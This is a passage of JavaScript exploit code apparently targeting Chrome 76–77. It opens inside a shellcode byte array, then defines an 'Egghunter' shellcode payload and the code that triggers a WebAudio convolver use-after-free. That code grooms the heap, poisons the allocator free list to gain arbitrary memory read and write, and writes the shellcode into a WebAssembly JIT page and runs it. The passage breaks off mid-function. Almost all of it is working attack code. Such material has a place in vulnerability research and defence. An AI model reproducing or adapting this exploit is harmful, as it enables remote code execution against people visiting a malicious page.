0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0xae, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);\r\nconst Egghunter = new Uint8Array([ 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x48, 0xc7, 0xc1, 0x88, 0x4e, 0x0d, 0x00, 0xe8, 0x21, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc7, 0x48, 0xc7, 0xc2, 0xd2, 0x33, 0x0e, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x6e, 0x01, 0x00, 0x00, 0x49, 0x89, 0xc5, 0x4d, 0x31, 0xe4, 0x4d, 0x31, 0xf6, 0x4d, 0x31, 0xff, 0x4d, 0x85, 0xff, 0x0f, 0x85, 0xf5, 0x00, 0x00, 0x00, 0x4d, 0x01, 0xf4, 0x49, 0xc7, 0xc0, 0x30, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0x41, 0xff, 0xd5, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x83, 0xf8, 0x30, 0x0f, 0x85, 0xc3, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xd0, 0x4c, 0x8b, 0x70, 0x18, 0x4c, 0x8b, 0x20, 0x81, 0x78, 0x28, 0x00, 0x00, 0x02, 0x00, 0x75, 0xb1, 0x81, 0x78, 0x20, 0x00, 0x10, 0x00, 0x00, 0x75, 0xa8, 0x83, 0x78, 0x24, 0x04, 0x75, 0xa2, 0x4c, 0x89, 0xf1, 0x48, 0x83, 0xe9, 0x08, 0x48, 0x31, 0xd2, 0x48, 0xff, 0xca, 0x48, 0xbb, 0x10, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88, 0x48, 0xff, 0xc3, 0x48, 0xff, 0xc2, 0x48, 0x39, 0xca, 0x7d, 0x80, 0x49, 0x39, 0x1c, 0x14, 0x74, 0x02, 0xeb, 0xf0, 0x4d, 0x8d, 0x3c, 0x14, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x08, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7f, 0x13, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x10, 0x00, 0x00, 0x00, 0x49, 0x39, 0xc7, 0x7c, 0x05, 0x4d, 0x31, 0xff, 0xeb, 0xcb, 0x48, 0x31, 0xc9, 0x49, 0x89, 0x0c, 0x14, 0x48, 0xc7, 0xc2, 0x3c, 0xd1, 0x38, 0x00, 0x48, 0x89, 0xf9, 0xe8, 0x9f, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4d, 0xc0, 0x49, 0xc7, 0xc0, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xd0, 0x48, 0x8b, 0x52, 0x18, 0x4c, 0x89, 0xe1, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x83, 0xec, 0x08, 0x40, 0x80, 0xe4, 0xf7, 0xff, 0xd0, 0x48, 0x89, 0xec, 0x5d, 0x49, 0x83, 0xc7, 0x08, 0x41, 0xff, 0xd7, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x41, 0x50, 0x57, 0x56, 0x49, 0x89, 0xc8, 0x48, 0xc7, 0xc6, 0x60, 0x00, 0x00, 0x00, 0x65, 0x48, 0xad, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x78, 0x30, 0x48, 0x89, 0xfe, 0x48, 0x31, 0xc0, 0xeb, 0x05, 0x48, 0x39, 0xf7, 0x74, 0x34, 0x48, 0x85, 0xf6, 0x74, 0x2f, 0x48, 0x8d, 0x5e, 0x38, 0x48, 0x85, 0xdb, 0x74, 0x1a, 0x48, 0xc7, 0xc2, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4b, 0x08, 0x48, 0x85, 0xc9, 0x74, 0x0a, 0xe8, 0x18, 0x01, 0x00, 0x00, 0x4c, 0x39, 0xc0, 0x74, 0x08, 0x48, 0x31, 0xc0, 0x48, 0x8b, 0x36, 0xeb, 0xcb, 0x48, 0x8b, 0x46, 0x10, 0x5e, 0x5f, 0x41, 0x58, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0x50, 0x02, 0x00, 0x00, 0x57, 0x56, 0x48, 0x89, 0x4d, 0xf8, 0x48, 0x89, 0x55, 0xf0, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x3c, 0x48, 0x01, 0xd9, 0x48, 0x83, 0xc1, 0x18, 0x48, 0x8b, 0x75, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x59, 0x70, 0x48, 0x01, 0xde, 0x48, 0x89, 0x75, 0xe8, 0x8b, 0x41, 0x74, 0x89, 0x45, 0xc0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x20, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x31, 0xdb, 0x8b, 0x5e, 0x24, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x5e, 0x1c, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x31, 0xf6, 0x48, 0x89, 0x75, 0xc8, 0x48, 0x8b, 0x45, 0xe8, 0x8b, 0x40, 0x18, 0x48, 0x39, 0xf0, 0x76, 0x7e, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0x65, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x75, 0x4c, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x7c, 0x16, 0x48, 0x39, 0xd0, 0x7d, 0x11, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0x76, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3, ]);\r\nlet DebugEgg = 0xeeeeeeee; // Used to create a magic QWORD to locate FastMalloc Extent/Super Pages in memory.\r\nlet GcPreventer = [];\r\nlet IIRFilters = [];\r\nvar SharedAudioCtx = undefined;\r\nlet FeedforwardSuperPageMetadata = undefined;\r\nlet OutputFloatArray = new Float32Array(10);\r\nlet MutableFreeListAudioBufs = [];\r\nlet DoubleAllocAudioBufs = [];\r\nlet ImageDataArray = [];\r\nconst EnableDebug = true;\r\nconst AlertOutput = false;\r\nvar HelperBuf = new ArrayBuffer(8);\r\nvar HelperDbl = new Float64Array(HelperBuf);\r\nvar HelperDword = new Uint32Array(HelperBuf);\r\nvar HelperBigInt = new BigUint64Array(HelperBuf);\r\nvar HelperUint8 = new Uint8Array(HelperBuf);\r\n\r\nfunction DebugLog(Message) {\r\n if(EnableDebug) {\r\n if(AlertOutput) {\r\n alert(Message);\r\n }\r\n else {\r\n console.log(Message); // In IE, console only works if devtools is open.\r\n }\r\n }\r\n}\r\n\r\nfunction Sleep(delay) {\r\n return new Promise(resolve => setTimeout(resolve, delay))\r\n}\r\n\r\nfunction ReverseBigInt(Val) {\r\n let ReversedVal = BigInt(0);\r\n let TempVal = Val;\r\n\r\n for (let i = 0; i < 8; i++) {\r\n ReversedVal = ReversedVal << BigInt(8);\r\n ReversedVal += TempVal & BigInt(0xFF);\r\n TempVal = TempVal >> BigInt(8);\r\n }\r\n\r\n return ReversedVal;\r\n}\r\n\r\nfunction ClearBigIntLow21(Val) {\r\n let BitMask = (BigInt(1) << BigInt(21)) - BigInt(1); // 0000000000000000000000000000000000000000000111111111111111111111\r\n let ClearedVal = Val & ~BitMask; // 1111111111111111111111111111111111111111111000000000000000000000\r\n return ClearedVal;\r\n}\r\n\r\nlet GetSuperPageBase = ClearBigIntLow21;\r\n\r\nfunction GetSuperPageMetadata(LeakedPtr) {\r\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\r\n return SuperPageBase + BigInt(0x1000); // Front and end Partition Pages of Super Page are Guard Pagees, with the exception of a single System Page at offset 0x1000 (second System Page) of the front end Partition Page\r\n}\r\n\r\nfunction GetPartitionPageIndex(LeakedPtr) {\r\n let Low21Mask = (BigInt(1) << BigInt(21)) - BigInt(1);\r\n let Index = (LeakedPtr & Low21Mask) >> BigInt(14);\r\n return Index;\r\n}\r\n\r\n\r\nfunction GetPartitionPageMetadata(LeakedPtr) {\r\n let Index = GetPartitionPageIndex(LeakedPtr);\r\n let partitionPageMetadataPtr = GetSuperPageMetadata(LeakedPtr) + (Index * BigInt(0x20));\r\n return partitionPageMetadataPtr;\r\n}\r\n\r\nfunction GetPartitionPageBase(LeakedPtr, Index) {\r\n let SuperPageBase = GetSuperPageBase(LeakedPtr);\r\n let PartitionPageBase = SuperPageBase + (Index << BigInt(14));\r\n return PartitionPageBase;\r\n}\r\n\r\nfunction GC() {\r\n let MyPromise = new Promise(function(GcCallback) {\r\n let Arg;\r\n \r\n for (var i = 0; i < 400; i++) {\r\n new ArrayBuffer(1024 * 1024 * 60).buffer;\r\n }\r\n \r\n GcCallback(Arg);\r\n });\r\n \r\n return MyPromise;\r\n}\r\n\r\n/*\r\nchrome_child!WTF::ArrayBufferContents::AllocateMemoryWithFlags+0xcf:\r\n00007ffa`cc086513 488b0e mov rcx,qword ptr [rsi] ds:00007ffe`0fc70000=????????????????\r\n*/\r\n\r\nfunction LeakQword(FreeListHead, TargetAddress) {\r\n FreeListHead[0] = TargetAddress;\r\n let TempVal = new BigUint64Array;\r\n TempVal.buffer;\r\n GcPreventer.push(TempVal);\r\n return ReverseBigInt(FreeListHead[0]);\r\n}\r\n \r\nfunction WriteQword(FreeListHead, TargetAddress, Val) {\r\n FreeListHead[0] = TargetAddress;\r\n let TempVal = new BigUint64Array(1);\r\n TempVal.buffer;\r\n TempVal[0] = Val;\r\n GcPreventer.push(TempVal);\r\n}\r\n\r\nfunction CreateWasmJITExport() {\r\n /*\r\n After this function returns, a new region of memory will appear with a\r\n single system page of 0x1000 bytes set to RWX for the JIT region for\r\n this WASM module\r\n \r\n 0x00000ACDB6790000:0x40000000 | Private\r\n 0x00000ACDB6790000:0x00001000 | RX | 0x00000000 | Abnormal private executable memory\r\n 0x00000ACDB6791000:0x00001000 | RWX | 0x00000000 | Abnormal private executable memory\r\n */\r\n \r\n var ImportObj = { imports: { imported_func: arg => console.log(arg) } };\r\n const WasmModuleBytes = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb];\r\n const WasmCode = new Uint8Array(WasmModuleBytes);\r\n const WasmModule = new WebAssembly.Instance(new WebAssembly.Module(WasmCode), ImportObj);\r\n return WasmModule.exports.exported_func;\r\n}\r\n\r\n/*\r\nstruct __attribute__((packed)) SlotSpanMetadata {\r\n unsigned long freelist_head;\r\n unsigned long next_slot_span;\r\n unsigned long bucket;\r\n uint32_t marked_full : 1;\r\n uint32_t num_allocated_slots : 13;\r\n uint32_t num_unprovisioned_slots : 13;\r\n uint32_t can_store_raw_size : 1;\r\n uint32_t freelist_is_sorted : 1;\r\n uint32_t unused1 : (32 - 1 - 2 * 13 - 1 - 1);\r\n uint16_t in_empty_cache : 1;\r\n uint16_t empty_cache_index : 7;\r\n uint16_t unused2 : (16 - 1 - 7);\r\n};\r\n\r\nstruct PartitionPage {\r\n union {\r\n struct SlotSpanMetadata span;\r\n size_t raw_size;\r\n struct PartitionSuperPageExtentEntry head;\r\n struct {\r\n char pad[32 - sizeof(uint16_t)];\r\n uint16_t slot_span_metadata_offset;\r\n };\r\n };\r\n};\r\n\r\nstruct PartitionBucket {\r\n unsigned long active_slot_spans_head;\r\n unsigned long empty_slot_spans_head;\r\n unsigned long decommitted_slot_spans_head;\r\n uint32_t slot_size;\r\n uint32_t num_system_pages_per_slot_span : 8;\r\n uint32_t num_full_slot_spans : 24;\r\n};\r\n*/\r\n\r\nfunction HuntSlotSpanHead(FreeListHead, SlotSize, SuperPageMetadataBase) {\r\n for(var SpanIndex = 0; SpanIndex < 128; SpanIndex++) {\r\n SlotSpanMetaAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20 + 0x10); // Always an extra 0x20 to account for start of SuperPage struct\r\n HelperBigInt[0] = SlotSpanMetaAddress;\r\n DebugLog(\"... targetting slot span metadata at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\r\n BucketAddress = LeakQword(FreeListHead, SlotSpanMetaAddress);\r\n HelperBigInt[0] = BucketAddress;\r\n DebugLog(\"... leaked bucket address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\r\n \r\n if(BucketAddress != BigInt(0)) {\r\n BucketAddress = BucketAddress + BigInt(0x18); // PartitionBucket.slot_size\r\n BucketSize = LeakQword(FreeListHead, BucketAddress);\r\n HelperBigInt[0] = BucketSize;\r\n DebugLog(\"... leaked bucket size is \" + HelperDword[1].toString(16) + \" \" + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\r\n \r\n if(HelperDword[0] == SlotSize) {\r\n DebugLog(\"... found desired slot size! Reading freelist head for SlotSpan...\");\r\n SlotSpanFreeListAddress = BigInt(SuperPageMetadataBase) + BigInt((SpanIndex * 0x20) + 0x20); // Always an extra 0x20 to account for start of SuperPage struct\r\n HelperBigInt[0] = LeakQword(FreeListHead, SlotSpanFreeListAddress);\r\n DebugLog(\"... leaked slot span freelist address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16) + \" for slot span \" + SpanIndex.toString(10));\r\n return HelperBigInt[0];\r\n }\r\n }\r\n }\r\n}\r\n\r\nfunction ExecutePayload(FreeListHead) {\r\n var WasmExport = CreateWasmJITExport();\r\n let FileReaderObj = new FileReader;\r\n let FileReaderLoaderSize = 0x140; // Literal size is 0x128, 0x140 is the bucket size post-alignment\r\n \r\n DebugLog(\"... WASM module and FileReader created.\");\r\n FileReaderObj.onerror = WasmExport;\r\n let FileReaderLoaderPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);\r\n\r\n if (!FileReaderLoaderPtr) {\r\n DebugLog(\"... failed to obtain free list head for bucket size 0x140 slot span\");\r\n return;\r\n }\r\n \r\n HelperBigInt[0] = FileReaderLoaderPtr;\r\n DebugLog(\"... estimated a FileReaderLoader alloc address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n FileReaderObj.readAsArrayBuffer(new Blob([])); // It is not the blob causing the allocation: FileReaderLoader itself as a class is allocated into the FastMalloc Extent\r\n let ValidationPtr = HuntSlotSpanHead(FreeListHead, FileReaderLoaderSize, FeedforwardSuperPageMetadata);\r\n \r\n if(ValidationPtr != FileReaderLoaderPtr) {\r\n HelperBigInt[0] = ValidationPtr;\r\n DebugLog(\"... successfully validated re-claim of FileReaderLoader slot (free list head for slot span has been re-claimed) at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n\r\n let FileReaderPtr = LeakQword(FreeListHead, FileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\r\n let VectorPtr = LeakQword(FreeListHead, FileReaderPtr + BigInt(0x28));\r\n let RegisteredEventListenerPtr = LeakQword(FreeListHead, VectorPtr);\r\n let EventListenerPtr = LeakQword(FreeListHead, RegisteredEventListenerPtr);\r\n let EventHandlerPtr = LeakQword(FreeListHead, EventListenerPtr + BigInt(0x8));\r\n let JsFuncObjPtr = LeakQword(FreeListHead, EventHandlerPtr + BigInt(0x8));\r\n let JsFuncPtr = LeakQword(FreeListHead, JsFuncObjPtr) - BigInt(1);\r\n let SharedFuncInfoPtr = LeakQword(FreeListHead, JsFuncPtr + BigInt(0x18)) - BigInt(1);\r\n let WasmExportedFunctDataPtr = LeakQword(FreeListHead, SharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\r\n let WasmInstancePtr = LeakQword(FreeListHead, WasmExportedFunctDataPtr + BigInt(0x10)) - BigInt(1);\r\n let StubAddrFieldOffset = undefined;\r\n\r\n switch (MajorVersion) {\r\n case 77:\r\n StubAddrFieldOffset = BigInt(0x8) * BigInt(16);\r\n break;\r\n case 76:\r\n StubAddrFieldOffset = BigInt(0x8) * BigInt(17);\r\n break\r\n }\r\n \r\n let RwxJitStubPtr = LeakQword(FreeListHead, WasmInstancePtr + StubAddrFieldOffset);\r\n HelperBigInt[0] = RwxJitStubPtr;\r\n DebugLog(\"... resolved JIT stub address of \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n\r\n for(var x = 0; x < Egghunter.length; x += 8) {\r\n JitChunkAddress = RwxJitStubPtr + BigInt(x);\r\n HelperBigInt[0] = JitChunkAddress;\r\n //DebugLog(\"... writing chunk of egghunter shellcode at offset \" + x.toString(10) + \" to JIT region at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n \r\n for(var y = 0; y < 8; y++) {\r\n HelperUint8[y] = Egghunter[x + y];\r\n }\r\n \r\n WriteQword(FreeListHead, JitChunkAddress, HelperBigInt[0]);\r\n }\r\n \r\n HelperBigInt[0] = RwxJitStubPtr;\r\n DebugLog(\"... executing shellcode at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n WasmExport();\r\n }\r\n else {\r\n DebugLog(\"... failed to validate re-claim of FileReaderLoader slot at \" + HelperDword[1].toString(16) + HelperDword[0].toString(16));\r\n }\r\n}\r\n\r\nasync function PrePayloadHeapGroom() {\r\n DebugLog(\"... grooming heap in preparation for R/W primitive creation and payload execution...\");\r\n await GC();\r\n DoubleAllocAudioBufs = []; // These were the \"holders\" making sure Chrome itself didn't re-claim feedforward up until this point. Now free and immediately re-claim them, once again as audio buffers. \r\n\r\n for (var j = 0; j < 80; j++) {\r\n MutableFreeListAudioBufs.push(SharedAudioCtx.createBuffer(1, 2, 10000));\r\n }\r\n\r\n // At this stage, feedforward is double allocated. Once as a feedforward or IIRFilters, and once as an audio buffer. Here we are putting it into double use, wherein as a feedforward it will now be (truly) free (and in the freelist), while in the other it is a committed/allocated audio buffer we can R/W.\r\n \r\n IIRFilters = new Array(1);\r\n await GC();\r\n\r\n for (var j = 0; j < 336; j++) {\r\n ImageDataArray.push(new ImageData(1, 2));\r\n }\r\n \r\n ImageDataArray = new Array(10);\r\n await GC();\r\n\r\n for (var j = 0; j < MutableFreeListAudioBufs.length; j++) {\r\n let MutableFreeListEntry = new BigUint64Array(MutableFreeListAudioBufs[j].getChannelData(0).buffer);\r\n if (MutableFreeListEntry[0] != BigInt(0)) {\r\n let FreeListHeadPtr = GetPartitionPageMetadata(ReverseBigInt(MutableFreeListEntry[0])); // Extract the Super Page base/metadata entry for the leaked flink from feedforward: this will be in an ArrayMalloc Extent as opposed to the FastMalloc Extent.\r\n let AllocCount = 0;\r\n MutableFreeListEntry[0] = ReverseBigInt(FreeListHeadPtr);\r\n \r\n // Spray new 8 byte allocations until our (controlled) poisoned free list flink entry is allocated\r\n \r\n do {\r\n GcPreventer.push(new ArrayBuffer(8));\r\n \r\n if (++AllocCount > 0x100000) {\r\n DebugLog(\"... failed to re-claim final free list flink with alloc spray\");\r\n return; // If we sprayed this number of allocations without our poisoned flink being consumed, assume the re-claim failed\r\n }\r\n } while (MutableFreeListEntry[0] != BigInt(0));\r\n \r\n // The last allocation consumed our mutable free list flink entry (which we had poisoned the flink of to point at the free list head metadata on the Super Page head).\r\n \r\n let FreeListHead = new BigUint64Array(new ArrayBuffer(8)); // Alloc the free list head itself. We can now control where new allocs are made without needing to do sprays.\r\n GcPreventer.push(FreeListHead);\r\n ExecutePayload(FreeListHead);\r\n return;\r\n }\r\n }\r\n\r\n return;\r\n}\r\n\r\nasync function DoubleAllocUAF(FeedforwardAddress, CallbackFunc) {\r\n let NumberOfChannels = 1;\r\n let TempAudioCtx = new OfflineAudioContext(NumberOfChannels, 48000 * 100, 48000);\r\n let AudioBufferSourceNode = TempAudioCtx.createBufferSource();\r\n let ConvolverNode = TempAudioCtx.createConvolver();\r\n let Finished = false;\r\n\r\n // Create and initialize two shared audio buffers: one for the buffer source, the other for the convolver (UAF)\r\n\r\n let BigSourceBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x100, 48000);\r\n let SmallUafBuf = TempAudioCtx.createBuffer(NumberOfChannels, 0x2, 48000);\r\n \r\n SmallUafBuf.getChannelData(0).fill(0);\r\n \r\n for (var i = 0; i < NumberOfChannels; i++) {\r\n var ChannelData = new BigUint64Array(BigSourceBuf.getChannelData(i).buffer);\r\n ChannelData[0] = FeedforwardAddress;\r\n }\r\n \r\n AudioBufferSourceNode.buffer = BigSourceBuf;\r\n ConvolverNode.buffer = SmallUafBuf;\r\n \r\n // Setup the audio processing graph and begin rendering\r\n\r\n AudioBufferSourceNode.loop = true;\r\n AudioBufferSourceNode.loopStart = 0;\r\n AudioBufferSourceNode.loopEnd = 1;\r\n AudioBufferSourceNode.connect(ConvolverNode);\r\n ConvolverNode.connect(TempAudioCtx.destination);\r\n AudioBufferSourceNode.start();\r\n \r\n TempAudioCtx.startRendering().then(function(Buf) {\r\n Buf = null;\r\n\r\n if (Finished) {\r\n TempAudioCtx = null;\r\n setTimeout(CallbackFunc, 200);\r\n return;\r\n } else {\r\n Finished = true;\r\n setTimeout(function() { DoubleAllocUAF(FeedforwardAddress, CallbackFunc); }, 1);\r\n }\r\n });\r\n \r\n while (!Finished) {\r\n ConvolverNode.buffer = 